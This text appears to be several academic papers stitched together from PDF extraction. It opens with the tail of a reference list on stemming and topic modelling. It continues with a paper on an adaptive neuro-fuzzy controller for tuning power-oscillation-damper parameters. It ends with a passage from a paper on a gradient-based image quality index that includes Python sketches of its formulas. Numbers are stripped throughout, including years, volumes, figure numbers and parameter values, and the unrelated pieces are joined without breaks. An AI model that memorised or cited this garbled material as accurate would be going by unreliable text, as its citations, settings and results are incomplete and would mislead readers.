au- thor was funded by a cornell university fellowship. references narayan l bhamidipati and sankar k pal. . stem- ming via distribution-based word segregation for clas- sification and retrieval. systems, man, and cyber- netics, part b: cybernetics, ieee transactions on, ( ): – . steven bird, ewan klein, and edward loper. . nat- ural language processing with python. o’reilly me- dia. available at: http://www.nltk.org/book/. david m blei, andrew y ng, and michael i jordan. . latent dirichlet allocation. the journal of ma- chine learning research, : – . matt chaput. . stemming library. available at: https://bitbucket.org/mchaput/stemming. antske fokkens, marieke van erp, marten postma, ted pedersen, piek vossen, and nuno freire. . off- spring from reproduction problems: what replication failure teaches us. in proceedings of the st acl, pages – . 
william b frakes and christopher j fox. . strength and similarity of affix removal stemming algorithms. in acm sigir forum, volume , pages – . acm. kuzman ganchev and mark dredze. . small sta- tistical models by random feature mixing. in proceed- ings of the acl hlt workshop on mobile language processing, pages – . justin grimmer and gary king. . general pur- pose computer-assisted clustering and conceptualiza- tion. pnas, ( ): – . pu han, si shen, dongbo wang, and yanyun liu. . the influence of word normalization in english docu- ment clustering. in computer science and automation engineering (csae), ieee international con- ference on, volume , pages – . ieee. donna harman. . how effective is suffixing? jour- nal of the american society for information science, ( ): – . carina jacobi, wouter van atteveldt, and kasper wel- bers. . quantitative analysis of large amounts of journalistic texts using topic modelling. digital jour- nalism, ( ): – . anjali ganesh jivani. . a comparative study of stemming algorithms. international journal of com- puter technology and applications, ( ): – . matthew l jockers and david mimno. . significant themes in th-century literature. poetics, ( ): – . sowmya kamath s, atif ahmed, and mani shankar. . a composite classification model for web ser- vices based on semantic & syntactic information inte- gration. in advance computing conference (iacc), ieee international, pages – . ieee. robert krovetz. . viewing morphology as an in- ference process. in proceedings of the th annual international acm sigir conference on research and development in information retrieval, pages – . acm. jey han lau, david newman, and timothy baldwin. . machine reading tea leaves: automatically evaluating topic coherence and topic model quality. in proceedings of the association for computational lin- guistics, pages – . zhiyuan liu, wenyi huang, yabin zheng, and maosong sun. . automatic keyphrase extraction via topic decomposition. in proceedings of the conference on empirical methods in natural language processing, pages – . association for computational lin- guistics. siaw ling lo, david cornforth, and raymond chiong. . effects of training datasets on both the extreme learning machine and support vector machine for tar- get audience identification on twitter. in proceedings of elm- volume , pages – . springer. julie b lovins. . development of a stemming al- gorithm. mechanical translation and computational linguistics, : – . prasenjit majumder, mandar mitra, swapan k parui, gobinda kole, pabitra mitra, and kalyankumar datta. . yass: yet another suffix stripper. acm trans- actions on information systems (tois), ( ): . andrew k mccallum. . mallet: a ma- chine learning for language toolkit. available at: http://mallet.cs.umass.edu. marina meilă. . comparing clusterings by the vari- ation of information. in bernhard schölkopf and man- fred k. warmuth, editors, learning theory and kernel machines, volume of lecture notes in computer science, pages – . springer berlin heidelberg. massimo melucci and nicola orio. . a novel method for stemmer generation based on hidden markov models. in proceedings of the th inter- national conference on information and knowledge management (cikm), pages – . acm. david mimno, hanna m wallach, edmund talley, miriam leenders, and andrew mccallum. . op- timizing semantic coherence in topic models. in pro- ceedings of the conference on empirical methods in natural language processing, pages – . asso- ciation for computational linguistics. 
yuhong nan, min yang, zhemin yang, shunfan zhou, guofei gu, and xiaofeng wang. . uipicker: user-input privacy identification in mobile applica- tions. in th usenix security symposium, pages – . chris d paice. . another stemmer. acm sigir forum, ( ): – . martin f porter. . an algorithm for suffix stripping. program, ( ): – . martin f porter. . snowball: a lan- guage for stemming algorithms. available at: http://www.snowball.tartarus.org/texts/introduction.html. sp ruba rani, b ramesh, m anusha, and jgr sathi- aseelan. . evaluation of stemming techniques for text classification. international journal of computer science and mobile computing, ( ): – . evan sandhaus. . the new york times anno- tated corpus. linguistic data consortium, dvd: ldc t . ivan stankov, diman todorov, and rossitza setchi. . enhanced cross-domain document clustering with a semantically enhanced text stemmer (sets). in- ternational journal of knowledge-based and intelli- gent engineering systems, ( ): – . chuan su. . machine learning for reducing the ef- fort of conducting systematic reviews in se. bachelor thesis. kristina toutanova, dan klein, christopher d manning, and yoram singer. . feature-rich part-of-speech tagging with a cyclic dependency network. in pro- ceedings of the conference of the north ameri- can chapter of the association for computational lin- guistics on human language technology-volume , pages – . association for computational lin- guistics. hanna m wallach, david m mimno, and andrew k mc- callum. . rethinking lda: why priors matter. in advances in neural information processing sys- tems, pages – . international journal of advanced network, monitoring and controls volume , no. , anfis coordination of changes in power oscillation damper parameters with variation in power system operating point dr i. i. alabi department of electrical/electronic engineering nigerian defence academy. kaduna. nigeria e-mail: alabiibitayo@yahoo.com dr a. i. araga, mr sabo aliyu department of electrical/electronic engineering nigerian defence academy. kaduna. nigeria e-mail: araga @gmail.com abstract—in this paper an adaptive neuro-fuzzy controller was designed to adaptively adjust the parameters of a power oscillation damper as the power system operating point changes due to change in operating point in a large interconnected network fitted with facts device and power oscillation damper. as a foundational work the generalized mathematic model of multi-machine power system with embedded facts was developes. the results obtained clearly reveals the effectiveness of this approach. keywords-neuro-fuzzy controller; mathematic model; oscillation damper; interconnected network i. introduction most of the facts based damping controllers belong to the pi (proportional + integral) type and work effectively in single machine system [ ]. however, the performance of the above mentioned damping controllers deteriorates in multi- machine power systems. the damping performance of the facts based damping controllers in multi-machine power systems can be improved by using fuzzy coordinated design [ ]. furthermore power oscillation damper are designed for specific operating point, but operating point changes as demand changes for optimal performance the parameter of power oscillation damper must continually change with changes in operating point for this reason anfis is deployed to predict the future values of pod parameters based on large population of such parameters obtained from all possible operating scenarios. 
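as a rough sketch of the data flow implied by this idea (and not the anfis implementation used in this work, which is built with matlab's fuzzy logic toolbox), the snippet below substitutes a simple interpolator for the trained network: it maps an operating-point feature to a recommended lead time constant using a hypothetical population of recorded parameters. all numeric values are placeholders.

```python
import numpy as np

# hypothetical training population: operating-point feature (modulus of the
# dominant eigenvalue) versus the lead time constant that gave the best damping
# at that operating point. values are placeholders, not data from this study.
eig_modulus = np.array([0.82, 0.88, 0.95, 1.03, 1.10])
t_lead_best = np.array([0.28, 0.31, 0.35, 0.40, 0.46])
order = np.argsort(eig_modulus)

def predict_t_lead(x):
    """stand-in for the trained anfis: interpolate the recorded population to
    suggest a lead time constant for a new operating point."""
    return np.interp(x, eig_modulus[order], t_lead_best[order])

print(predict_t_lead(0.99))   # parameter suggested for an unseen operating point
```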
the structure of the proposed adaptive neuro fuzzy coordinated controller is shown in figure , where the inputs are speed deviation of synchronous machines and their acceleration. thus, the conventional damping controllers are adaptively tuned by using anfis controllers. w w st st k  lag lead st st   lag lead st st   anfis pod adaptive parameter leadt lag t operating conditions 𝑉𝑝𝑜𝑑 𝑖 𝑈 𝑖 𝑃𝑖 𝑄𝑖 𝑉 𝑖 figure . proposed adaptive pod controller ii. literature review an attempt has been made to apply hybrid neuro-fuzzy approach for the coordination between the conventional power oscillation damping (pod) controllers for multi- machine power systems. with the help of matlab, a class of adaptive networks, that are functionally equivalent to fuzzy inference systems, is proposed. the proposed architecture is referred to as anfis (adaptive neuro-fuzzy inference system) [ ]-[ ]. an adaptive fuzzy inference system (anfis) based upfc supplementary damping controller to superimpose the damping function on the control signal of upfc for damping of power system electromechanical oscillations was proposed in [ ]-[ ]. the acronym anfis derives its name from adaptive neuro-fuzzy inference system. using a given input/output data set, the toolbox function anfis constructs a fuzzy inference system (fis) whose membership function parameters are tuned (adjusted) using either a back propagation algorithm alone, or in combination with a least squares type of method. this allows fuzzy systems to learn from the data they are modeling [ ]. it has a network-type structure similar to that of a neural network. thus, it maps inputs through input membership functions and associated doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , parameters and then through output membership functions and associated parameters to outputs, can be used to interpret the input/output map. the parameters associated with the membership functions will change through the learning process. the computation of these parameters (or their adjustment) is facilitated by a gradient vector, which provides a measure of how well the fuzzy inference system is modeling the input/output data for a given set of parameters [ ]-[ ]. once the gradient vector is obtained, any of several optimization routines could be applied in order to adjust the parameters so as to reduce some error measure (usually defined by the sum of the squared difference between actual and desired outputs) [ ]-[ ]. iii. proposed method a. fuzzy system modeling and controller philosophy input output x n x y   n y unknown system figure . an unknown system as a black box in the unknown system in figure only a set of input, and output can be measured. the mathematical description relating the input to the output can be a mathematical formula, such as a mapping or a function that relates the input to the output in the form          or a set of differential equations in the form            or a logical linguistic statement which can be quantified mathematically in the form: if (input ) and … and (input ) ( ) then (output ) and …. and (output ) fuzzy systems modeling is to quantify the logical form of equation ( . 
) by using fuzzy logic and the mathematical functional model of equation ( . ) or by using fuzzy logic together with the differential equation model of equation ( . ). the fuzzy logic controller comprises four stages: fuzzification, a knowledge base, decision making and defuzzification. the fuzzification interface converts input data into suitable linguistic values that can be viewed as labels of fuzzy sets. to obtain a deterministic control action, a defuzzification strategy is required. defuzzification is a mapping from a space of fuzzy control actions defined over an output universe of discourse into a space of nonfuzzy (crisp) control actions. the defuzzification of the variables into crisp outputs is tested by using the weighted average method. after generating the fuzzy inference, the generated information describing the model's structure and the parameters of both the input and output variables is used in the anfis training phase. this information is fine-tuned by applying the hybrid learning or the backpropagation schemes. the algorithm employed for anfis training is shown in figure : the input/output training data are generated, the genfis input parameters (number of membership functions, membership function type, etc.) are set, the command-line anfis training routine is invoked with the epoch number, the genfis output and the training data as input arguments, and the training data are plotted against the anfis output; if the output is not satisfactory, the number of membership functions and the epoch number are increased and the procedure is repeated.

figure . flowchart of anfis training

iv. results and discussions

power oscillation dampers were designed for upfc embedded in two test case study systems: a) kundur two area system, and b) nigerian kv national grid. however, the optimal performance of these pods is only guaranteed at the particular operating points under consideration; at any other operating point, different values of the time constants must be determined for the damping to be effective.

a. result of anfis training (test system )

the training data and check data were generated by randomly varying the load (multiplying the load with a factor of . ) in the two areas of the test system. at each operating point the actual values of the pod parameters were calculated. the anfis parameter settings are as shown in table i. figure is the plot of training data and anfis output for the lead time constant, while figure is the graph of check data and anfis output for the lead time constant. the plot of the error associated with the training is shown in figure for both the check data and the training data. the corresponding plots for the lag time constant are shown in figures to .

table i. anfis parameter settings: nummfs ; mftype 'gbellmf'; epoch_n

figure . training data and anfis output: lead time constant (lead time constant versus modulus of eigenvalue). figure . check data and anfis output: lead time constant. figure . prediction error for training data and check data: lead time constant.
figure . training data and anfis output: lag time constant. figure . check data and anfis output: lag time constant. figure . prediction error for training data and check data: lag time constant.

b. result of anfis training (test system )

the data for training were obtained by randomly varying the load in different areas by a factor of . , from low to medium and high values, for about scenarios; the data were divided into training data and check data. the lead-lag time constants were recorded as they changed with operating conditions, as well as the lead and lag time constants that provided the best damping under different operating conditions. the results obtained for the lag time constant are shown in figures to , and figures to show the corresponding results for the lead time constant. figure is the graph of the input membership function, while figures and are the graphs of the anfis adjusted membership function that gives the exact simulation of the training data for the lag time constant and lead time constant, respectively.

figure . plot of anfis data and training data: lag time constant. figure . plot of anfis data and check data: lag time constant. figure . prediction error for training data and check data.

figure . plot of anfis output and training data: lead time constant. figure . plot of anfis data and check data: lead time constant. figure . prediction error for training data and check data. figure . input membership function (degree of membership versus modulus of eigenvalues).
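the input membership functions shown in the figure above are of the generalized bell type ('gbellmf' in table i). a minimal sketch of that membership-function shape follows; the parameters a, b, c and the input range are placeholders for illustration, not the values fitted during training.

```python
import numpy as np

def gbellmf(x, a, b, c):
    """generalized bell membership function: 1 / (1 + |(x - c) / a| ** (2 * b))."""
    return 1.0 / (1.0 + np.abs((x - c) / a) ** (2.0 * b))

# placeholder parameters: five membership functions spread over a hypothetical
# range of the input (modulus of the eigenvalues).
x = np.linspace(0.8, 1.2, 200)
for c in np.linspace(0.8, 1.2, 5):
    mu = gbellmf(x, a=0.05, b=2.0, c=c)   # degree of membership in [0, 1]
```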
figure . anfis adjusted membership function: lag time constant. figure . anfis adjusted membership function: lead time constant.

v. conclusion

in this work an adaptive neuro-fuzzy controller has been developed for the purpose of coordinating the changes in power oscillation damper parameters with variation in the power system operating point. the accuracy with which the controller was able to predict the values of the pod parameters clearly reveals the effectiveness of the proposed approach.

references

[ ] chia, b.h.k., s. morris and p.k. dash, "a fuzzy-feedback linearizing nonlinear control of csi based statcom for synchronous generator stabilization", proceedings of the ieee international conference on control applications, vol. , september, pp. - .
[ ] "external neuro-control for a series capacitive reactance compensator based on a voltage source pwm converter in damping power oscillations", ieee transactions on industrial electronics, vol. , no. , february , pp. - .
[ ] j. r. jang, "anfis: adaptive-network-based fuzzy inference system", ieee transactions on systems, man and cybernetics, vol. , no. , pp. - .
[ ] s. p. ghoshal, "multi-area frequency and tie-line power flow control with fuzzy logic based integral gain scheduling", ie (i) journal-ei, vol. , december , pp. - .
[ ] fuzzy logic toolbox—for use with matlab, the mathworks inc.
[ ] t. r. sumithira and a. nirmal kumar, "elimination of harmonics in multilevel inverters connected to solar photovoltaic systems using anfis: an experimental case study", journal of applied research and technology, vol. , no. , february , pp. - .
[ ] jyh-shing roger jang, "anfis: adaptive-network-based fuzzy inference system", ieee trans. syst. man and cyber., ( ), pp. - .
[ ] e. v. larsen, j. j. sanchez-gasca and j. h. chow, "concept for design of facts controllers to damp power swings", ieee transactions, pwrs- ( ), pp. - .
[ ] c. r. houck, j. joines and m. kay, "genetic algorithm optimization toolbox, user's manual", version . .
[ ] jang, j.-s. r. and n. gulley, "gain scheduling based fuzzy controller design", proc. of the international joint conference of the north american fuzzy information processing society biannual conference, the industrial fuzzy control and intelligent systems conference, and the nasa joint technology workshop on neural network and fuzzy logic, san antonio, texas, dec.
[ ] jang, j.-s. r. and c.-t. sun, "neuro-fuzzy modeling and control", proceedings of the ieee, march .
[ ] jang, j.-s. r. and c.-t. sun, neuro-fuzzy and soft computing: a computational approach to learning and machine intelligence, prentice hall.
[ ] kaufmann, a. and m.m. gupta, introduction to fuzzy arithmetic, v.n. reinhold.

international journal of advanced network, monitoring and controls. doi: .
/ijanmc- - adaptively truncating gradient for image quality assessment minjuan gao school of electrical and control engineering shaanxi university of science & technology xi’an, china e-mail: gaominjuan @ .com hongshe dang school of electrical and control engineering shaanxi university of science & technology xi’an, china e-mail: @qq.com xuande zhang school of electronic information and artifificial intelligence shaanxi university of science & technology xi’an, china e-mail: @qq.com abstract—objective image quality assessment (iqa) aims to develop computational models to predict the perceptual image quality consistent with subjective evaluations. as image information is presented by the change in intensity values in the spatial domain, the gradient, as a basic tool for measuring the change, is widely used in iqa models. however, does the change measured by the gradient actually correspond to the change perceived by the human visual system (hvs)? to explore this issue, in this paper, we analyze how the ability of the hvs to perceive changes is affected by the upper threshold, and we propose an iqa index based on an adaptively truncating gradient. specifically, the upper threshold at each pixel in an image is adaptively determined according to the image content, and the adaptively truncating gradient is obtained by retaining the part of the gradient magnitude that is less than the upper threshold and truncating the part that is greater than the upper threshold. then, the distorted image quality is calculated by comparing the similarity of the adaptively truncating gradient between a reference image and the distorted image. experimental results on six benchmark databases demonstrate that the proposed index correlates well with human evaluations. keywords-image quality assessment; human visual system; upper threshold; truncating gradient i. introduction image quality assessment deals with the quantitative evaluation of the quality of images and can be widely used in image acquisition, compression, storage, transmission and other image processing systems. generally, human beings are the ultimate receivers of images. subjective evaluation by humans is a reliable iqa method, but it is cumbersome and difficult to apply in real-world scenarios. an objective iqa method aims to design mathematical models to automatically measure the image quality in a way that is consistent with human evaluations. according to the availability of ground-truth images, objective iqa indices fall into three categories: full-reference (fr), reduced-reference (rr) and no-reference (nr) models [ ]. in this paper, the discussion is focused on fr models. at present, there are two popular techniques for constructing fr models: knowledge-based and learning-based techniques. the deep learning method learns the evaluation model in an end-to-end manner, and its "black-box" lacks explanation. furthermore, this approach requires a large number of training samples, but the cost of obtaining high-quality and mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , convincing samples is relatively high. currently, the commonly used method for obtaining samples is still data augmentation. in this work, we emphasize the knowledge-based approach, which uses knowledge about the hvs to heuristically construct iqa models. investigating these models reveals that the gradient feature is widely employed. 
in analyzing the relationship between the gradient feature and the iqa task, the gradient has at least the following two characteristics. . the information contained in natural images is presented by changes in intensity value or color in the spatial domain. in extreme cases, the constant image (smoothness) and the pure noise image (variation in all directions) cannot convey any information. thus, the feature of measuring change is widely used in iqa, with the gradient as the basic tool for measuring change. . the judgment of the image quality level in iqa is different from the classic discrimination task. the features for discrimination tasks, such as face recognition and fingerprint recognition, should be robust to image distortion, while the features for iqa should be sensitive to image distortion. the gradient feature is sensitive to image distortion and image content but is weak in robustness. representative fr models using the gradient feature include the feature similarity index (fsim) [ ], gradient magnitude similarity deviation index (gmsd) [ ], superpixel-based similarity index (spsim) [ ] and directional anisotropic structure metric (dasm) [ ]. in the fsim and gmsd, the image gradient magnitude is employed as the fundamental feature. spsim is computed on the basis of three features: superpixel luminance, superpixel chrominance and pixel gradient. the dasm is obtained by incorporating the gradient magnitude, anisotropy and local directivity features. objective iqa models are designed by simulating the behaviors of the hvs, which integrates perception, understanding and assessing functions, that is, humans evaluate the image quality in the hvs perception space. therefore, the features for iqa should be the subjective quantity perceived by the hvs. the gradient is often directly used in iqa models as an effective feature to measure change; however, does the change measured by the gradient actually correspond to that perceived by the hvs? in fact, the change measured by the gradient belongs to the objective quantity (objective physical stimulus), while that perceived by the hvs belongs to the subjective quantity (subjective response). thus, how can one map the objective quantity to the subjective quantity? this mapping function is nonlinear, and it is difficult to accurately describe its form. empirically, the ability of the human perception system to sense changes has a certain upper threshold. when the objective change exceeds the upper threshold, the subjective change increases insignificantly in situations such as the human perception of changes in salt- solution saltiness, at an outside temperature, and in the weight of objects carried. in this paper, we discuss the ability of the hvs to perceive changes affected by the upper threshold by employing the adaptively truncating gradient to measure the change perceived by the hvs. we propose an iqa index based on the adaptively truncating gradient. specifically, the upper threshold at each pixel in the image is adaptively determined according to the image content, and the adaptively truncating gradient is obtained by retaining the part of the gradient magnitude that is less than the upper threshold and truncating the part that is greater than the upper threshold. experimental results on public databases show that the proposed index correlates well with the subjective judgments. ii. an iqa index based on adaptively truncating gradient a. 
definition of adaptively truncating gradient
the image information is presented by the change in the intensity values in the spatial domain, and this change may be destroyed by degradation of the image quality. the gradient feature can effectively measure this change and is widely used in iqa algorithms. the image gradient can be obtained by convolving the image with a gradient operator, such as the sobel, roberts, scharr and prewitt operators. different gradient operators may yield different performance for an iqa model. this problem was discussed in [ , ], where the experimental results showed that the scharr operator obtains slightly better performance than the others. here, we adopt a 3 × 3 scharr operator whose templates along the horizontal (h) and vertical (v) directions take the standard form

$h_h = \frac{1}{16}\begin{bmatrix} 3 & 0 & -3 \\ 10 & 0 & -10 \\ 3 & 0 & -3 \end{bmatrix}, \qquad h_v = \frac{1}{16}\begin{bmatrix} 3 & 10 & 3 \\ 0 & 0 & 0 \\ -3 & -10 & -3 \end{bmatrix}$

denote $\mathbf{r} = \{r_1, r_2, \ldots, r_i, \ldots, r_n\}$ for a reference image and $\mathbf{d} = \{d_1, d_2, \ldots, d_i, \ldots, d_n\}$ for a distorted image, where $i$ is the pixel index and $n$ is the total number of pixels. the image gradients in the horizontal and vertical directions can be obtained by convolving the image with $h_h$ and $h_v$, and the gradient magnitude is computed from their root mean square. the gradient magnitudes of $\mathbf{r}$ and $\mathbf{d}$ at each pixel $i$, denoted as $g(\mathbf{r},i)$ and $g(\mathbf{d},i)$, are calculated as

$g(\mathbf{r},i) = \sqrt{(\mathbf{r} \otimes h_h)^2(i) + (\mathbf{r} \otimes h_v)^2(i)}$ (1)

$g(\mathbf{d},i) = \sqrt{(\mathbf{d} \otimes h_h)^2(i) + (\mathbf{d} \otimes h_v)^2(i)}$ (2)

where the symbol $\otimes$ denotes the convolution operation.
the image gradient only reflects the objective changes in images. since human evaluation of image quality is carried out in the hvs perception space, the image features extracted for iqa models should reflect the subjective changes perceived by the hvs. we consider that the ability of the hvs to perceive changes is subject to an upper threshold: when the objective change exceeds the upper threshold, the subjective change does not increase appreciably. in this study, we define the adaptively truncating gradient to measure the subjective change sensed by the hvs.
denote $T$ as the upper threshold. we define a truncating function $\mathrm{trunc}(\cdot)$: any given variable $x$ is retained when it is less than $T$ and truncated when it is greater than $T$. the specific expression is

$\mathrm{trunc}(x) = \begin{cases} T, & \text{if } x \ge T \\ x, & \text{if } x < T \end{cases}$ (3)

the truncating gradients of $\mathbf{r}$ and $\mathbf{d}$ at each pixel $i$ are denoted as $g_t(\mathbf{r},i)$ and $g_t(\mathbf{d},i)$, and the upper threshold at this point is denoted as $T(i)$. using formula (3), $g_t(\mathbf{r},i)$ is calculated as

$g_t(\mathbf{r},i) = \mathrm{trunc}(g(\mathbf{r},i)) = \begin{cases} T(i), & \text{if } g(\mathbf{r},i) \ge T(i) \\ g(\mathbf{r},i), & \text{if } g(\mathbf{r},i) < T(i) \end{cases}$ (4)

in eq. (4), if the value of $g(\mathbf{r},i)$ is greater than $T(i)$, then $g(\mathbf{r},i)$ is truncated and the truncating gradient $g_t(\mathbf{r},i)$ is set to $T(i)$; that is, the part of the gradient magnitude that is greater than the upper threshold is masked. otherwise, $g(\mathbf{r},i)$ is not masked and the truncating gradient $g_t(\mathbf{r},i)$ is set equal to $g(\mathbf{r},i)$; that is, the part of the gradient magnitude that is less than the upper threshold can be perceived by the hvs. similarly, using formula (3), $g_t(\mathbf{d},i)$ is calculated as

$g_t(\mathbf{d},i) = \mathrm{trunc}(g(\mathbf{d},i)) = \begin{cases} T(i), & \text{if } g(\mathbf{d},i) \ge T(i) \\ g(\mathbf{d},i), & \text{if } g(\mathbf{d},i) < T(i) \end{cases}$ (5)

obviously, for the calculation of the truncating gradients $g_t(\mathbf{r},i)$ and $g_t(\mathbf{d},i)$ in eqs. (4) and (5), the selection of the upper threshold $T(i)$ is very important.
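as a concrete illustration of eqs. (1)-(5), the following python/numpy sketch computes the scharr gradient magnitude of an image and truncates it against a given per-pixel threshold map (whose adaptive construction is described next). it is a minimal sketch, not the authors' implementation (which was written in matlab); in particular, the 1/16 normalization of the scharr templates and the border handling are assumptions.

import numpy as np
from scipy.ndimage import convolve

# 3x3 scharr templates along the horizontal and vertical directions;
# the 1/16 normalization is an assumption and may differ from the original code.
H_H = np.array([[ 3.0, 0.0,  -3.0],
                [10.0, 0.0, -10.0],
                [ 3.0, 0.0,  -3.0]]) / 16.0
H_V = H_H.T

def gradient_magnitude(img):
    # eqs. (1)-(2): combine the horizontal and vertical responses at every pixel
    gx = convolve(img.astype(np.float64), H_H, mode='nearest')
    gy = convolve(img.astype(np.float64), H_V, mode='nearest')
    return np.sqrt(gx ** 2 + gy ** 2)

def truncating_gradient(grad, threshold_map):
    # eqs. (3)-(5): keep gradient magnitudes below the per-pixel threshold t(i)
    # and clip everything above it to t(i)
    return np.minimum(grad, threshold_map)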
according to weber's law, the ratio of the stimulus change that causes a just noticeable difference (jnd) to the original stimulus intensity is a constant. in psychology, the hvs has the property of light adaptation, and the perception of luminance obeys weber's law [ ]. the just noticeable incremental luminance over the background perceived by the hvs is related to the background luminance. inspired by this observation, and in contrast to weber's law (which concerns the lower, just noticeable threshold), we consider that the upper threshold for truncating a significantly perceptible stimulus change is also related to the original stimulus intensity value. because different pixels in the image correspond to different gray values, the original stimulus intensity values will also differ. here, we adaptively determine the upper threshold according to the background luminance of different areas of the image. the adaptive upper threshold is defined as

$T(i) = \frac{l(i)}{t}$ (6)

where $t$ is an adjustable threshold parameter (the details of selecting $t$ will be presented in section iii-a) and $l(i)$ takes the larger value of the luminance of $\mathbf{r}$ and $\mathbf{d}$ at point $i$:

$l(i) = \max\big(\bar{r}(i), \bar{d}(i)\big)$ (7)

in formula (7), the luminance values $\bar{r}(i)$ and $\bar{d}(i)$ at pixel $i$ of $\mathbf{r}$ and $\mathbf{d}$ are estimated by formulas (8) and (9). for the reference image $\mathbf{r}$, denote the square neighborhood centered at pixel $i$ as $\Omega_i^r$, and let the intensity value of any pixel in this neighborhood be $r_{i,j}$, $j \in \Omega_i^r$. similarly, for the distorted image, denote the square neighborhood centered at pixel $i$ as $\Omega_i^d$, and let the intensity value of any pixel in this neighborhood be $d_{i,j}$, $j \in \Omega_i^d$. then

$\bar{r}(i) = \frac{1}{m}\sum_{j \in \Omega_i^r} r_{i,j}$ (8)

$\bar{d}(i) = \frac{1}{m}\sum_{j \in \Omega_i^d} d_{i,j}$ (9)

where $m$ is the number of pixels in the square neighborhood, determined by its radius.
based on eq. (6), the value of the upper threshold at each pixel in an image can be adaptively determined according to the image content. then, the adaptively truncating gradient is obtained by formulas (4) and (5). figure shows the gradient map and the adaptively truncating gradient map corresponding to the reference image and the distorted image. it can be seen that the maximum amplitude of the adaptively truncating gradient map is substantially smaller than that of the gradient map.
figure . the gradient map and the adaptively truncating gradient map corresponding to the reference image and the distorted image. (a) the reference image. (b) the distorted image. (c) and (d) are the gradient maps of (a) and (b), respectively. (e) and (f) are the adaptively truncating gradient maps of (a) and (b), respectively.
b. the proposed iqa index
with the adaptively truncating gradient defined, the local quality of the distorted image is predicted by the similarity between the adaptively truncating gradients of $\mathbf{r}$ and $\mathbf{d}$, which is defined as

$s(i) = \frac{2\, g_t(\mathbf{r},i)\, g_t(\mathbf{d},i) + c}{g_t(\mathbf{r},i)^2 + g_t(\mathbf{d},i)^2 + c}$ (10)

where the parameter $c$ is introduced to avoid the denominator becoming zero and supplies numerical stability. the range of $s(i)$ is from 0 to 1: $s(i)$ is close to 0 when $g_t(\mathbf{r},i)$ and $g_t(\mathbf{d},i)$ are quite different, and $s(i)$ achieves the maximal value 1 when $g_t(\mathbf{r},i)$ is equal to $g_t(\mathbf{d},i)$. the overall quality score of the distorted image is predicted by pooling the local quality $s(i)$ over all pixels:

$\mathrm{score} = \frac{1}{n}\sum_{i=1}^{n} s(i)$ (11)

a higher score indicates better image quality.
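putting eqs. (6)-(11) together, the sketch below scores a distorted image against its reference; gradient_magnitude and truncating_gradient refer to the sketch in the previous subsection, and the default values of the neighborhood radius, t and c are placeholders rather than the tuned settings reported in section iii.

import numpy as np
from scipy.ndimage import uniform_filter

def adaptive_threshold(ref, dist, radius, t):
    # eqs. (6)-(9): per-pixel upper threshold t(i) = l(i) / t, where l(i) is the larger
    # of the two local mean luminances over a square neighborhood around pixel i
    mean_r = uniform_filter(ref.astype(np.float64), size=2 * radius + 1)
    mean_d = uniform_filter(dist.astype(np.float64), size=2 * radius + 1)
    return np.maximum(mean_r, mean_d) / t

def atg_score(ref, dist, radius=2, t=4.0, c=100.0):
    # eqs. (10)-(11): similarity of the adaptively truncating gradients, mean-pooled;
    # radius, t and c are illustrative placeholder values
    thr = adaptive_threshold(ref, dist, radius, t)
    g_r = truncating_gradient(gradient_magnitude(ref), thr)
    g_d = truncating_gradient(gradient_magnitude(dist), thr)
    sim = (2.0 * g_r * g_d + c) / (g_r ** 2 + g_d ** 2 + c)
    return sim.mean()  # higher score indicates better predicted quality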
iii. experimental results
a. experimental setup
all the experiments in this study were implemented in matlab r b and executed on a lenovo ideapad laptop with an intel core i - hq @ . ghz cpu and gb ram. several well-known fr metrics were used for performance comparison with the proposed method, including psnr, ssim [ ], fsim [ ], gmsd [ ], dasm [ ], ifc [ ], vif [ ], ms-ssim [ ], and ssrm [ ]. to widely evaluate the performance of these metrics, six public databases were employed for the experiments: tid [ ], tid [ ], csiq [ ], live [ ], ivc [ ] and a [ ]. the tid database consists of reference images and a total of distorted images, each of which is distorted using different types of distortions at four different levels of distortion. tid is an expanded version of tid and contains distorted images with distortion types. the live database includes reference images and distorted images with five distortion types. the csiq database contains original images and distorted images degraded by six types of distortion. the ivc database consists of reference images and distorted images. the a database includes reference images and distorted images. note that for the color images in these databases, only the luminance component is evaluated.
four commonly used performance criteria are employed to evaluate the competing iqa metrics. the spearman rank order correlation coefficient (srocc) and the kendall rank order correlation coefficient (krocc) are adopted for measuring the prediction monotonicity of an objective iqa metric. to compute the other two criteria, the pearson linear correlation coefficient (plcc) and the root mean squared error (rmse), we need to apply a regression analysis. the plcc measures the consistency between the objective scores after nonlinear regression and the subjective mean opinion scores (mos). the rmse measures the relative distance between the objective scores after nonlinear regression and the mos. for the nonlinear regression, we used the following mapping function:

$q_p = \beta_1\left(\frac{1}{2} - \frac{1}{1 + e^{\beta_2 (q - \beta_3)}}\right) + \beta_4 q + \beta_5$ (12)

where $q$ and $q_p$ are the original objective scores of an iqa metric and the objective scores after regression, respectively, and $\beta_i$, $i = 1, \ldots, 5$, are the parameters to be fitted. higher srocc, krocc and plcc values and lower rmse values indicate a better performance of an iqa metric.
for the proposed metric, there are three parameters that need to be set to obtain the final quality score: the neighborhood radius, the threshold parameter $t$ and the stability constant $c$. selecting the first reference images and the corresponding distorted images in the tid database as the testing subset, we choose the parameter values that yield the highest srocc; the resulting values are used in all remaining experiments. to further analyze the effect of the threshold parameter $t$, more experiments were carried out. figure shows the srocc performance with different $t$ values on the six databases; on most databases, the srocc is highest at the selected value of $t$. this result indicates that the range of the upper threshold $T(i)$ is approximately $[0, 255/t]$ for an 8-bit grayscale image according to formula (6); if the change in image intensity is above this upper threshold, it will be masked in visual perception.
figure . srocc performance with different t values on six databases
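the four criteria and the mapping function of eq. (12) can be computed along the following lines; this is a generic scipy-based sketch (the initial guesses for the beta parameters are arbitrary assumptions), not the evaluation code behind the tables below.

import numpy as np
from scipy import stats
from scipy.optimize import curve_fit

def logistic_map(q, b1, b2, b3, b4, b5):
    # five-parameter nonlinear mapping of eq. (12) from objective scores to predicted mos
    return b1 * (0.5 - 1.0 / (1.0 + np.exp(b2 * (q - b3)))) + b4 * q + b5

def iqa_criteria(scores, mos):
    scores = np.asarray(scores, dtype=np.float64)
    mos = np.asarray(mos, dtype=np.float64)
    srocc = stats.spearmanr(scores, mos).correlation
    krocc = stats.kendalltau(scores, mos).correlation
    # fit the mapping before computing plcc and rmse; p0 is a rough initial guess
    p0 = [np.ptp(mos), 0.1, float(np.mean(scores)), 0.1, float(np.mean(mos))]
    beta, _ = curve_fit(logistic_map, scores, mos, p0=p0, maxfev=20000)
    mapped = logistic_map(scores, *beta)
    plcc = stats.pearsonr(mapped, mos)[0]
    rmse = float(np.sqrt(np.mean((mapped - mos) ** 2)))
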